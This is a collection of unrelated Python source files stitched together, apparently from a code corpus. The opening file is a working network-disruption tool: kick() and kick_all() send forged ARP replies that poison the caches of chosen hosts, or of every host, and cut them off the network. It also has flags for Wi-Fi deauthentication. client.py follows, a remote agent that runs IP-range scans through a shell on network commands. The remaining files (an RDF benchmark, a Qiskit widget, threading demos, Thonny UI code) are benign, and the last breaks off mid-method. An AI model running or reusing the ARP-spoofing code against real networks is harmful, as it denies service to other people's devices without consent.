                kick_hosts = host_scan(True, True, True, True)
                print('\n{0}{1}Choose {2}MULTIPLE {1}hosts listed above or press {2}R {1}for rescan:\n{0}Seperate the targets with \'{2},{1}\'\n'.format(' ' * 4, G, R, N))
    def kick():
        # Poison every target's ARP cache in a round, sleep 3.5s, repeat;
        # Ctrl+C at any point restores everything kicked so far.
        targets = {}
        while True:
            for target in target_list:
                for host in kick_hosts:
                    if target == kick_hosts[host]['id']:
                        MAC = kick_hosts[host]['mac']
                        IP = host
                        NAME = kick_hosts[host]['name']
                        targets[IP] = {'mac': MAC}
                        try:
                            send(ARP(op=2, psrc=gatewayIP, pdst=IP, hwdst=gatewayMAC))
                        except(KeyboardInterrupt):
                            restore_kick(targets, gatewayIP, gatewayMAC)
            try:
                sleep(3.5)
            except:
                restore_kick(targets, gatewayIP, gatewayMAC)
    gatewayIP = get_gateway()
    gatewayMAC = get_gateway_mac(gatewayIP)
    kick_hosts = host_scan(True, True, True, True)
    print('\n{0}{1}Choose {2}MULTIPLE {1}hosts listed above or press {2}R {1}for rescan:\n{0}Seperate the targets with \'{2},{1}\'\n'.format(' ' * 4, G, R, N))
    target_list = choice_input()
    os.system('clear')
    kick_msg = False
    # Print the "Currently kicking" banner on the first target and plain
    # rows for the rest.
    for target in target_list:
        for host in kick_hosts:
            if target == kick_hosts[host]['id']:
                MAC = kick_hosts[host]['mac']
                IP = host
                NAME = kick_hosts[host]['name']
                if kick_msg:
                    print('{8}{1}{2} {3}| {4}{5} {3}| {6}{7}{3}'.format(G, R, MAC, N, Y, IP, B, NAME, ' '*19))
                if not kick_msg:
                    print('{0}Currently kicking{3}: {1}{2} {3}| {4}{5} {3}| {6}{7}{3}'.format(G, R, MAC, N, Y, IP, B, NAME))
                    kick_msg = True
    kick()
def kick_all():
    """ARP-spoof every host on the network (except the gateway) until Ctrl+C."""
    def kick():
        # Drop the gateway from the target set first.
        # NOTE(review): deleting from kick_hosts while iterating .keys() is
        # only safe on Python 2 (where .keys() returns a list); on Python 3
        # this raises RuntimeError.
        for host in kick_hosts.keys():
            if host == gatewayIP:
                print('{0} -> not kicking: {1}{2}{0} ({4}gateway{0}){3}'.format(G, Y, gatewayIP, N, R))
                del kick_hosts[host]
        # Poison every host's ARP cache every 2 seconds; Ctrl+C restores.
        while True:
            for host in kick_hosts:
                try:
                    send(ARP(op=2, psrc=gatewayIP, pdst=host, hwdst=gatewayMAC))
                except(KeyboardInterrupt):
                    restore_kick(kick_hosts, gatewayIP, gatewayMAC)
            try:
                sleep(2)
            except(KeyboardInterrupt):
                restore_kick(kick_hosts, gatewayIP, gatewayMAC)
    gatewayIP = get_gateway()
    gatewayMAC = get_gateway_mac(gatewayIP)
    kick_hosts = host_scan(True, True, False, True)
    sleep(0.2)
    print('\n{0}KICKING STARTED ...{1}'.format(G, N))
    kick()
#> MAIN
# Global flags coordinating wifi_scan's channel hopper and deauth_all's
# scan/deauth cycle; APs accumulates discovered access points.
do_channelhop = True
do_deauth = True
do_print_ap = True
APs = {}
if __name__ == '__main__':
    print_banner()
    choice = get_choice()
    handle_choice()
|
client.py | from data import functions
import socket
import threading
import sys
import json
from subprocess import Popen, PIPE
from time import sleep
def parsecommand(json_command):
    """Translate a JSON scan request into a qubo.jar command line.

    :param json_command: dict with keys range, portrange, threads, timeout,
        pingcount, fulloutput, filtermotd, noping, minonline, filterversion.
    :return: (command, ip_range) on success, or (None, None) when the IP
        range is missing/invalid. The original returned a bare ``None``
        there, which crashed callers that unpack two values.
    NOTE(security): the result is run via Popen(..., shell=True) elsewhere;
    values originate from the network, so the character whitelists below
    are the only injection barrier -- keep them strict.
    """
    command = "java -jar -Dfile.encoding=UTF-8 data/qubo.jar -nooutput"
    ip_range = json_command["range"]
    if ip_range is None:
        return None, None
    # Whitelist for ranges such as "1.2.3.0-1.2.3.255".
    if not all(char in "-.0123456789" for char in ip_range):
        return None, None
    command += " --iprange " + ip_range
    if json_command["portrange"] is not None:
        # Whitelist for port ranges such as "25560-25580" or "80,443".
        if all(char in "-,0123456789" for char in json_command["portrange"]):
            command += " --portrange " + json_command["portrange"]
    if json_command["threads"] is not None and json_command["threads"] > 0:
        command += " --threads " + str(json_command["threads"])
    if json_command["timeout"] is not None and json_command["timeout"] > 0:
        command += " --timeout " + str(json_command["timeout"])
    if json_command["pingcount"] is not None and 0 < json_command["pingcount"] < 20:
        command += " --pingcount " + str(json_command["pingcount"])
    if json_command["fulloutput"]:
        command += " -fulloutput "
    if json_command["filtermotd"] is not None and 1 < len(json_command["filtermotd"]) < 100:
        # was json_command["filtermotd"].len() -- str has no .len() method,
        # so any filtermotd request raised AttributeError.
        command += " --filtermotd " + json_command["filtermotd"]
    if json_command["noping"]:
        command += " -noping "
    if json_command["minonline"] is not None and json_command["minonline"] > 1:
        command += " --minonline " + str(json_command["minonline"])
    if json_command["filterversion"] is not None and 1 < len(json_command["filterversion"]) < 100:
        # same .len() bug fixed here
        command += " --filterversion " + json_command["filterversion"]
    return command, ip_range
def receive_mex(client_socket):
    """Receive one message from *client_socket*.

    :return: the decoded utf-8 string, or 0 on disconnect/error (callers
        treat 0 as "connection lost").
    BUGFIX: when the peer closed the connection cleanly, recv() returns
    b'' forever and the original looped endlessly; treat empty reads as a
    disconnect and return 0.
    """
    try:
        data = b''
        while len(data) < 1:
            chunk = client_socket.recv(1024)
            if chunk == b'':
                # orderly shutdown by the peer
                return 0
            data += chunk
        return data.decode("utf-8")
    except Exception:
        # socket error or undecodable payload: report as disconnect
        return 0
class scan:
    """Queue of scan jobs executed one at a time in a background thread.

    Jobs are stored as parallel lists indexed by arrival order; results
    are sent back over the current socket as soon as it is connected.
    Uses the module-level ``language`` dict for user-facing messages.
    """
    def __init__(self, sock):
        # Parallel job lists: command line, IP range, requester address,
        # captured stdout, and the per-job sender thread.
        self.command = []
        self.scan_range = []
        self.target = []
        self.stdout = []
        self.send_thread = []
        self.sock = sock
        self.connected = True
        # scan_counter = jobs finished, scan_to_do = jobs queued.
        self.scan_counter = 0
        self.scan_to_do = 0
        self.scan_thread = threading.Thread(target=self.start_scan, daemon=True)
        self.scan_thread.start()
    def add_scan(self, command, target, scan_range):
        """Queue a new scan job; announce queueing if one is already running."""
        if self.scan_counter < self.scan_to_do:
            print(scan_range, language["client"]["scan_queue"])
        self.command.append(command)
        self.target.append(target)
        self.scan_range.append(scan_range)
        self.scan_to_do += 1
    def start_scan(self):
        """Worker loop: run queued commands one at a time via the shell.

        NOTE(review): this is a busy-wait loop (no sleep when idle) and the
        command string comes from the network (shell=True) -- see
        parsecommand's whitelisting.
        """
        while True:
            if self.scan_counter < self.scan_to_do:
                process = Popen(self.command[self.scan_counter], shell=True, stdout=PIPE, stderr=PIPE)
                print(self.scan_range[self.scan_counter], language["client"]["scan_started"])
                process.wait()
                self.stdout.append(process.communicate()[0])
                print(self.scan_range[self.scan_counter], language["client"]["scan_finished"])
                self.send_thread.append(threading.Thread(target=self.send_results, daemon=True))
                self.send_thread[self.scan_counter].start()
                self.scan_counter += 1
    def send_results(self):
        """Send this job's output once the socket is (re)connected."""
        # Capture the index now; scan_counter advances after this thread starts.
        counter = self.scan_counter
        while True:
            if self.connected:
                self.sock.send(self.stdout[counter])
                break
            sleep(5)
    def new_socket(self, sock):
        # Swap in the socket of a reconnected controller.
        self.sock = sock
        self.connected = True
    def set_status(self, status):
        # Mark the connection up/down; send_results polls this flag.
        self.connected = status
def connection(port):
    """Accept controller connections on *port* and feed commands to the scanner.

    Runs forever: each accepted connection is read until it drops, then a
    new listening socket is created and the existing scan queue is
    re-attached to the next controller that connects.
    """
    alert_connection = False
    while True:
        print(language["client"]["waiting_connection"])
        # NOTE(review): a fresh socket is bound on every reconnect without
        # SO_REUSEADDR, which can fail with EADDRINUSE while the previous
        # socket lingers in TIME_WAIT.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(('0.0.0.0', port))
        sock.listen(5)
        client_socket, address = sock.accept()
        connected = True
        if alert_connection:
            # Reconnect: keep the existing scan queue, swap in the new socket.
            scanner.new_socket(client_socket)
            alert_connection = False
        else:
            scanner = scan(client_socket)
        print(language["client"]["connection_established"], address)
        while connected:
            received_mex = receive_mex(client_socket)
            if received_mex == 0:
                # 0 means the controller disconnected (see receive_mex).
                connected = False
                scanner.set_status(connected)
                alert_connection = True
                print(language["client"]["connection_lost"], address)
            else:
                json_command = json.loads(received_mex)
                command, scan_range = parsecommand(json_command)
                if command is not None:
                    scanner.add_scan(command, address, scan_range)
                else:
                    # Invalid request: tell the controller nothing was queued.
                    client_socket.send(bytes("None", "utf-8"))
def main():
    """Entry point: load settings/language, ask for a port, start serving.

    Fixes two input bugs: a non-numeric port crashed int(port) with
    ValueError, and an out-of-range port printed an error but then
    proceeded with an unusable str port (bind would fail later).
    """
    global settings
    global language
    settings = functions.get_settings()
    language = functions.get_lang(settings)
    functions.clear()
    print(language["client"]["first_setup"])
    # Re-ask until the port is empty (default 4100) or a valid number.
    while True:
        port = input(language["choice"])
        if port == "":
            port = 4100
            break
        try:
            port = int(port)
        except ValueError:
            print(language["client"]["error_port_range"])
            continue
        if 1025 <= port <= 65535:
            break
        print(language["client"]["error_port_range"])
    connection_thread = threading.Thread(target=connection, args=[port], daemon=True)
    connection_thread.start()
    # Foreground loop: typing "stop" terminates the client.
    while True:
        x = input(language["client"]["stop_connection_question"])
        if x.lower() == "stop":
            sys.exit()
|
graph_digest_benchmark.py | #!/usr/bin/env python
'''
This benchmark will produce graph digests for all of the
downloadable ontologies available in Bioportal.
'''
from rdflib import *
from rdflib.compare import to_isomorphic
import sys, csv
from urllib import *
from io import StringIO
from collections import defaultdict
from urllib2 import urlopen
from multiprocessing import *
from Queue import Empty
bioportal_query = '''
PREFIX metadata: <http://data.bioontology.org/metadata/>
select distinct ?ontology ?title ?download where {
?ontology a metadata:Ontology;
metadata:omvname ?title;
metadata:links ?links.
?links metadata:Ontology ?download.
filter(regex(?download, "/download"))
}
'''
# CSV column order for the benchmark output; each worker fills a stats dict
# with these keys (graph_digest populates the runtime/count fields).
stat_cols = [
    'id',
    'ontology',
    'download_url',
    'tree_depth',
    'color_count',
    'individuations',
    'prunings',
    'initial_color_count',
    'adjacent_nodes',
    'initial_coloring_runtime',
    'triple_count',
    'graph_digest',
    'to_hash_runtime',
    'canonicalize_triples_runtime',
    'error',
]
def files_benchmark(ontologies, output_file, threads):
    """Digest each ontology URL in worker processes; write stats to CSV.

    Python 2 code (print statements, multiprocessing Queue). Each worker
    loads a graph, computes its canonical digest (which fills the stats
    dict in place), and reports results -- including errors -- back on
    finished_tasks so every task produces exactly one CSV row.
    """
    w = open(output_file, 'w')
    writer = csv.DictWriter(w, stat_cols)
    writer.writeheader()
    tasks = Queue()
    finished_tasks = Queue()
    dl_lock = Semaphore(4)
    task_count = len(ontologies)
    def worker(q, finished_tasks, dl_lock):
        # Consume tasks until the queue is exhausted.
        try:
            while True:
                stats = q.get()
                og = Graph()
                try:
                    og.load(stats['download_url'])
                    print stats['ontology'], stats['id']
                    ig = to_isomorphic(og)
                    # graph_digest() also records timings/counts into stats.
                    graph_digest = ig.graph_digest(stats)
                    finished_tasks.put(stats)
                except Exception as e:
                    # Record the failure so the row count still matches.
                    print 'ERROR', stats['id'], e
                    stats['error'] = str(e)
                    finished_tasks.put(stats)
        except Empty:
            pass
    for i in range(int(threads)):
        print "Starting worker", i
        t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
        t.daemon = True
        t.start()
    for download in ontologies:
        # defaultdict(str) so DictWriter never sees missing columns.
        stats = defaultdict(str)
        stats.update({
            "id": download.split("/")[-1].split(".")[0],
            "ontology": download.split("/")[-1].split(".")[0],
            "download_url": download
        })
        tasks.put(stats)
    tasks.close()
    # Drain exactly task_count results, flushing each row as it arrives.
    written_tasks = 0
    while written_tasks < task_count:
        stats = finished_tasks.get()
        # print "Writing", stats['ontology']
        writer.writerow(stats)
        w.flush()
        written_tasks += 1
def bioportal_benchmark(apikey, output_file, threads):
    # Benchmark graph digests for every downloadable Bioportal ontology.
    # The ontology list is fetched as JSON-LD from the Bioportal REST API
    # (authenticated with `apikey`) and filtered with `bioportal_query`.
    metadata = Namespace("http://data.bioontology.org/metadata/")
    url = 'http://data.bioontology.org/ontologies?apikey=%s' % apikey
    ontology_graph = Graph()
    print url
    ontology_list_json = urlopen(url).read()
    ontology_graph.parse(StringIO(unicode(ontology_list_json)), format="json-ld")
    ontologies = ontology_graph.query(bioportal_query)
    w = open(output_file, 'w')
    writer = csv.DictWriter(w, stat_cols)
    writer.writeheader()
    tasks = Queue()
    finished_tasks = Queue()
    dl_lock = Semaphore(4)  # at most 4 concurrent downloads across workers
    task_count = len(ontologies)

    def worker(q, finished_tasks, dl_lock):
        # Worker process: download (rate-limited by dl_lock), digest, report.
        try:
            while True:
                stats = q.get()
                og = Graph()
                try:
                    try:
                        dl_lock.acquire()
                        og.load(stats['download_url'] + "?apikey=%s" % apikey)
                    finally:
                        dl_lock.release()
                    print stats['ontology'], stats['id']
                    ig = to_isomorphic(og)
                    # graph_digest fills timing/size fields into `stats` as a side effect
                    graph_digest = ig.graph_digest(stats)
                    finished_tasks.put(stats)
                except Exception as e:
                    print 'ERROR', stats['id'], e
                    stats['error'] = str(e)
                    finished_tasks.put(stats)
        except Empty:
            pass

    for i in range(int(threads)):
        print "Starting worker", i
        t = Process(target=worker, args=[tasks, finished_tasks, dl_lock])
        t.daemon = True  # don't block interpreter exit on stuck workers
        t.start()
    for ontology, title, download in ontologies:
        stats = defaultdict(str)
        stats.update({
            "id": ontology,
            "ontology": title,
            "download_url": download
        })
        tasks.put(stats)
    tasks.close()
    written_tasks = 0
    # Collect exactly one result row per submitted task, flushing as we go
    while written_tasks < task_count:
        stats = finished_tasks.get()
        # print "Writing", stats['ontology']
        writer.writerow(stats)
        w.flush()
        written_tasks += 1
if __name__ == '__main__':
    # Usage: either a list of ontology URLs plus <output_file> <threads>
    # (5+ argv entries -> files_benchmark), or exactly
    # <apikey> <output_file> <threads> (-> bioportal_benchmark).
    if len(sys.argv) > 4:
        files_benchmark(sys.argv[1:-2], sys.argv[-2], sys.argv[-1])
    else:
        bioportal_benchmark(sys.argv[1], sys.argv[2], sys.argv[3])
|
backend_info.py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=protected-access
"""Interactive backend widget."""
import threading
from typing import Union
import ipyvuetify as vue
from IPython.display import display # pylint: disable=import-error
from qiskit.test.mock import FakeBackendV2 as FakeBackend
from qiskit_ibm_provider.ibm_backend import IBMBackend
from .config_widget import config_tab
from .gates_widget import gates_tab
from .jobs_widget import jobs_tab
from .qubits_widget import qubits_tab
from .live_data_widget import LiveDataVisualization
from ..visualization.interactive import iplot_error_map
from ..utils.hgp import to_instance_format
def _async_job_loader(
    tab: vue.TabItem, backend: Union[IBMBackend, FakeBackend]
) -> None:
    """Fill *tab* with the job summary widget.

    Intended to run in a background thread so the dashboard can be shown
    before the (slow) job history has finished loading.

    Args:
        tab: Tab item to populate.
        backend: Backend whose jobs are displayed.
    """
    jobs_widget = jobs_tab(backend)
    tab.children = [jobs_widget]
def backend_widget(backend: Union[IBMBackend, FakeBackend]) -> None:
    """Display backend information as a widget.

    Builds a card whose ``vue.Tabs`` children are six ``vue.Tab`` headers
    followed by six matching ``vue.TabItem`` bodies.  The job summary tab
    is populated asynchronously (see ``_async_job_loader``).

    Bug fix: the original listed the error-map ``TabItem`` twice, giving
    seven bodies for six headers and shifting the "Live Data" and
    "Job Summary" contents onto the wrong tabs; the duplicate is removed.

    Args:
        backend: Display information about this backend.
    """
    vue.theme.dark = False
    if isinstance(backend, FakeBackend):
        # Mock backends carry credentials directly; build the instance string from them.
        cred = backend._credentials
        instance = to_instance_format(cred.hub, cred.group, cred.project)
    else:
        instance = backend._api_client._params.instance
    last_tab = vue.TabItem(children=[])  # filled asynchronously with the job summary
    livedata = LiveDataVisualization()
    card = vue.Card(
        height=600,
        outlined=True,
        children=[
            vue.Toolbar(
                flat=True,
                color="#002d9c",
                children=[
                    vue.ToolbarTitle(
                        children=["{} @ ({})".format(backend.name(), instance)],
                        style_="color:white",
                    )
                ],
            ),
            vue.Tabs(
                vertical=True,
                children=[
                    vue.Tab(children=["Configuration"]),
                    vue.Tab(children=["Qubits"]),
                    vue.Tab(children=["Non-local Gates"]),
                    vue.Tab(children=["Error map"]),
                    vue.Tab(children=["Live Data"]),
                    vue.Tab(children=["Job Summary"]),
                    vue.TabItem(children=[config_tab(backend)]),
                    vue.TabItem(children=[qubits_tab(backend)]),
                    vue.TabItem(children=[gates_tab(backend)]),
                    vue.TabItem(
                        children=[
                            iplot_error_map(
                                backend, figsize=(None, None), as_widget=True
                            )
                        ]
                    ),
                    vue.TabItem(
                        children=[
                            livedata.create_visualization(
                                backend, figsize=(11, 9), show_title=False
                            )
                        ]
                    ),
                    last_tab,
                ],
            ),
        ],
    )
    # Load job data async for a bit better performance
    thread = threading.Thread(target=_async_job_loader, args=(last_tab, backend))
    thread.start()
    display(card)
|
gil.py | import time
import threading
def profile(func):
    """Decorator that times each call to *func* and prints the elapsed seconds.

    Fixes over the original: keyword arguments are forwarded correctly
    (``**kw`` instead of ``*kw``, which unpacked the dict's *keys* as extra
    positional arguments) and the wrapped function's return value is
    propagated instead of being discarded.
    """
    def wrapper(*args, **kw):
        start = time.time()
        result = func(*args, **kw)
        end = time.time()
        print('Cost:{}'.format(end - start))
        return result
    return wrapper
def fib(n):
    """Naive exponential Fibonacci-style recursion used as CPU-bound load.

    Note: the base case returns ``n`` itself for ``n <= 2`` (so fib(2) == 2),
    matching the original benchmark definition.
    """
    if n > 2:
        return fib(n - 1) + fib(n - 2)
    return n
@profile
def nothread():
    """Run the fib(36) workload twice, sequentially (single-threaded baseline)."""
    for _ in range(2):
        fib(36)
    return
@profile
def withthread():
    """Run two fib(36) workloads on separate threads (GIL demo: no speedup)."""
    workers = []
    for _ in range(2):
        worker = threading.Thread(target=fib, args=(36,))
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()
# Run both versions: due to the GIL, the threaded variant is not faster
# than the sequential one for this CPU-bound workload.
nothread()
withthread()
|
__init__.py | # Threaded function snippet
import threading
from functools import wraps
def threaded(fn):
    """Decorator that runs ``fn`` in a background thread.

    The wrapper starts the thread immediately and returns the
    ``threading.Thread`` object so the caller may ``join()`` it.
    """
    @wraps(fn)  # Not sure if this is necessary.....
    def wrapper(*args, **kwargs):
        worker = threading.Thread(target=fn, args=args, kwargs=kwargs)
        worker.start()
        return worker
    return wrapper
|
multicast_test.py | import threading
import time
import typing as ty
from collections import defaultdict
from xoto3.utils.multicast import LazyMulticast
def test_lazy_multicast():
    """Check that LazyMulticast fans one producer stream out to many consumers.

    10 consumer threads subscribe to a shared stream of 30 integers;
    each consumer must receive the full, ordered sequence.
    """

    class Recvr(ty.NamedTuple):
        # NOTE(review): appears unused in this test - possibly leftover
        nums: ty.List[int]

    CONSUMER_COUNT = 10
    NUM_NUMS = 30
    # Each consumer releases the semaphore once; the producer only starts
    # emitting after all of them have arrived.
    sem = threading.Semaphore(0)

    def start_numbers_stream(num_nums: int, recv):
        # Producer factory handed to LazyMulticast; returns a cleanup callable.
        def stream_numbers():
            for i in range(CONSUMER_COUNT):
                sem.acquire()
            # wait for 10 consumers to start
            for i in range(num_nums):
                recv(i)

        t = threading.Thread(target=stream_numbers, daemon=True)
        t.start()
        return t.join

    mc = LazyMulticast(start_numbers_stream)  # type: ignore
    consumer_results = defaultdict(list)

    def consume_numbers():
        # Consumer thread: announce readiness, then collect NUM_NUMS values.
        sem.release()
        thread_id = threading.get_ident()
        with mc(NUM_NUMS) as nums_stream:
            for i, num in enumerate(nums_stream):
                consumer_results[thread_id].append(num)
                if i == NUM_NUMS - 1:
                    break

    for i in range(CONSUMER_COUNT):
        threading.Thread(target=consume_numbers, daemon=True).start()

    time.sleep(1)  # give all consumer threads time to finish
    assert len(consumer_results) == CONSUMER_COUNT
    for results in consumer_results.values():
        assert list(range(NUM_NUMS)) == results
|
ui_utils.py | # -*- coding: utf-8 -*-
import collections
import logging
import os
import platform
import re
import signal
import subprocess
import sys
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from _tkinter import TclError
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.languages import get_button_padding, tr
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.tktextext import TweakableText
PARENS_REGEX = re.compile(r"[\(\)\{\}\[\]]")
class CommonDialog(tk.Toplevel):
    """Base class for dialogs.

    If the window receives focus while not mapped, it deiconifies itself
    and restores focus to the widget that had it.
    """

    def __init__(self, master=None, cnf={}, **kw):
        super().__init__(master=master, cnf=cnf, **kw)
        self.bind("<FocusIn>", self._unlock_on_focus_in, True)

    def _unlock_on_focus_in(self, event):
        if self.winfo_ismapped():
            return
        focussed_widget = self.focus_get()
        self.deiconify()
        if focussed_widget:
            focussed_widget.focus_set()

    def get_padding(self):
        # Default outer padding for dialog layouts, in pixels
        return ems_to_pixels(2)
class CommonDialogEx(CommonDialog):
    """CommonDialog that hosts its content in a themed ttk frame and
    closes on <Escape> or the window-manager close button."""

    def __init__(self, master=None, cnf={}, **kw):
        super().__init__(master=master, cnf=cnf, **kw)
        # Both Esc and the WM close button destroy the dialog
        self.bind("<Escape>", self.on_close, True)
        self.protocol("WM_DELETE_WINDOW", self.on_close)
        # Need to fill the dialog with a frame to gain theme support
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)
        self.main_frame = ttk.Frame(self)
        self.main_frame.grid(row=0, column=0, sticky="nsew")

    def on_close(self, event=None):
        self.destroy()
class QueryDialog(CommonDialogEx):
    """Modal dialog asking the user for a single string value.

    With ``options`` the input widget is a combobox pre-filled with those
    choices; otherwise it is a plain entry.  The value is available from
    ``get_result()`` after the dialog closes (None if cancelled).
    """

    def __init__(
        self,
        master,
        title: str,
        prompt: str,
        initial_value: str = "",
        options: List[str] = [],  # NOTE(review): mutable default; never mutated here, so benign
        entry_width: Optional[int] = None,
    ):
        super().__init__(master)

        self.var = tk.StringVar(value=initial_value)
        self.result = None  # set by on_ok / on_cancel

        margin = self.get_padding()
        spacing = margin // 2

        self.title(title)
        self.prompt_label = ttk.Label(self.main_frame, text=prompt)
        self.prompt_label.grid(row=1, column=1, columnspan=2, padx=margin, pady=(margin, spacing))

        # Combobox when choices are given, plain entry otherwise
        if options:
            self.entry_widget = ttk.Combobox(
                self.main_frame, textvariable=self.var, values=options, height=15, width=entry_width
            )
        else:
            self.entry_widget = ttk.Entry(self.main_frame, textvariable=self.var, width=entry_width)
        # Both main Enter and keypad Enter accept the value
        self.entry_widget.bind("<Return>", self.on_ok, True)
        self.entry_widget.bind("<KP_Enter>", self.on_ok, True)
        self.entry_widget.grid(
            row=3, column=1, columnspan=2, sticky="we", padx=margin, pady=(0, margin)
        )

        self.ok_button = ttk.Button(
            self.main_frame, text=tr("OK"), command=self.on_ok, default="active"
        )
        self.ok_button.grid(row=5, column=1, padx=(margin, spacing), pady=(0, margin), sticky="e")
        self.cancel_button = ttk.Button(self.main_frame, text=tr("Cancel"), command=self.on_cancel)
        self.cancel_button.grid(row=5, column=2, padx=(0, margin), pady=(0, margin), sticky="e")

        self.main_frame.columnconfigure(1, weight=1)

        self.entry_widget.focus_set()

    def on_ok(self, event=None):
        # Accept: remember current value and close
        self.result = self.var.get()
        self.destroy()

    def on_cancel(self, event=None):
        # Cancel: discard value and close
        self.result = None
        self.destroy()

    def get_result(self) -> Optional[str]:
        """Return the accepted string, or None if the dialog was cancelled."""
        return self.result
def ask_string(
    title: str,
    prompt: str,
    initial_value: str = "",
    options: Optional[List[str]] = None,
    entry_width: Optional[int] = None,
    master=None,
) -> Optional[str]:
    """Show a modal QueryDialog and return the entered string.

    Returns None if the user cancelled.  ``options``, when given, turns
    the entry into a combobox with those choices.

    The mutable default argument ``options=[]`` was replaced with the
    ``None`` sentinel (best practice); callers see identical behavior.
    """
    dlg = QueryDialog(
        master,
        title,
        prompt,
        initial_value=initial_value,
        options=options if options is not None else [],
        entry_width=entry_width,
    )
    show_dialog(dlg, master)
    return dlg.get_result()
class CustomMenubar(ttk.Frame):
    """Themed replacement for the native menubar, built from ttk labels.

    Each ``add_cascade`` call adds a label which pops up the given menu on
    click; hover highlighting is done via the CustomMenubarLabel style map.
    """

    def __init__(self, master):
        ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
        self._menus = []  # menus added so far (also used for grid column index)
        self._opened_menu = None  # menu currently popped up, if any
        ttk.Style().map(
            "CustomMenubarLabel.TLabel",
            background=[
                ("!active", lookup_style_option("Menubar", "background", "gray")),
                ("active", lookup_style_option("Menubar", "activebackground", "LightYellow")),
            ],
            foreground=[
                ("!active", lookup_style_option("Menubar", "foreground", "black")),
                ("active", lookup_style_option("Menubar", "activeforeground", "black")),
            ],
        )

    def add_cascade(self, label, menu):
        """Add a labelled entry that pops up *menu* below the label on click."""
        label_widget = ttk.Label(
            self,
            style="CustomMenubarLabel.TLabel",
            text=label,
            padding=[6, 3, 6, 2],
            font="TkDefaultFont",
        )

        # Extra left padding only for the first entry
        if len(self._menus) == 0:
            padx = (6, 0)
        else:
            padx = 0
        label_widget.grid(row=0, column=len(self._menus), padx=padx)

        def enter(event):
            label_widget.state(("active",))

            # Don't know how to open this menu when another menu is open
            # another tk_popup just doesn't work unless old menu is closed by click or Esc
            # https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
            # unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
            # print("ENTER", menu, self._opened_menu)
            if self._opened_menu is not None:
                self._opened_menu.unpost()
                click(event)

        def leave(event):
            label_widget.state(("!active",))

        def click(event):
            try:
                # print("Before")
                self._opened_menu = menu
                # Pop the menu up directly below the label
                menu.tk_popup(
                    label_widget.winfo_rootx(),
                    label_widget.winfo_rooty() + label_widget.winfo_height(),
                )
            finally:
                # print("After")
                self._opened_menu = None

        label_widget.bind("<Enter>", enter, True)
        label_widget.bind("<Leave>", leave, True)
        label_widget.bind("<1>", click, True)
        self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
    """
    Enables inserting panes according to their position_key-s.
    Automatically adds/removes itself to/from its master AutomaticPanedWindow.
    Fixes some style glitches.
    """

    def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
        tk.PanedWindow.__init__(self, master, **kwargs)
        self._pane_minsize = 100  # minimum pane size in pixels (default for add/insert)
        self.position_key = position_key
        self._restoring_pane_sizes = False  # re-entrancy guard for sash restoration
        self._last_window_size = (0, 0)
        self._full_size_not_final = True
        self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
        self._update_appearance_binding = self.bind(
            "<<ThemeChanged>>", self._update_appearance, True
        )
        self.bind("<B1-Motion>", self._on_mouse_dragged, True)
        self._update_appearance()

        # should be in the end, so that it can be detected when
        # constructor hasn't completed yet
        self.preferred_size_in_pw = preferred_size_in_pw

    def insert(self, pos, child, **kw):
        """Insert a pane; pos "auto" picks the slot from child.position_key."""
        kw.setdefault("minsize", self._pane_minsize)
        if pos == "auto":
            # According to documentation I should use self.panes()
            # but this doesn't return expected widgets
            for sibling in sorted(
                self.pane_widgets(),
                key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
            ):
                if (
                    not hasattr(sibling, "position_key")
                    or sibling.position_key == None
                    or sibling.position_key > child.position_key
                ):
                    pos = sibling
                    break
            else:
                pos = "end"

        if isinstance(pos, tk.Widget):
            kw["before"] = pos
        self.add(child, **kw)

    def add(self, child, **kw):
        kw.setdefault("minsize", self._pane_minsize)
        tk.PanedWindow.add(self, child, **kw)
        self._update_visibility()
        self._check_restore_preferred_sizes()

    def remove(self, child):
        tk.PanedWindow.remove(self, child)
        self._update_visibility()
        self._check_restore_preferred_sizes()

    def forget(self, child):
        tk.PanedWindow.forget(self, child)
        self._update_visibility()
        self._check_restore_preferred_sizes()

    def destroy(self):
        # Unbind handlers registered in __init__ before tearing down
        self.unbind("<Configure>", self._configure_binding)
        self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
        tk.PanedWindow.destroy(self)

    def is_visible(self):
        """Return True if this window is currently shown (mapped or paned)."""
        if not isinstance(self.master, AutomaticPanedWindow):
            return self.winfo_ismapped()
        else:
            return self in self.master.pane_widgets()

    def pane_widgets(self):
        """Return the actual child widgets of the panes (not Tk references)."""
        result = []
        for pane in self.panes():
            # pane is not the widget but some kind of reference object
            assert not isinstance(pane, tk.Widget)
            result.append(self.nametowidget(str(pane)))
        return result

    def _on_window_resize(self, event):
        if event.width < 10 or event.height < 10:
            # Ignore degenerate sizes during window setup
            return
        window = self.winfo_toplevel()
        window_size = (window.winfo_width(), window.winfo_height())
        initializing = hasattr(window, "initializing") and window.initializing
        if (
            not initializing
            and not self._restoring_pane_sizes
            and (window_size != self._last_window_size or self._full_size_not_final)
        ):
            self._check_restore_preferred_sizes()
            self._last_window_size = window_size

    def _on_mouse_dragged(self, event):
        # User dragged a sash: remember the resulting pane sizes as preferred
        if event.widget == self and not self._restoring_pane_sizes:
            self._update_preferred_sizes()

    def _update_preferred_sizes(self):
        """Record current sizes of panes that have a preferred size."""
        for pane in self.pane_widgets():
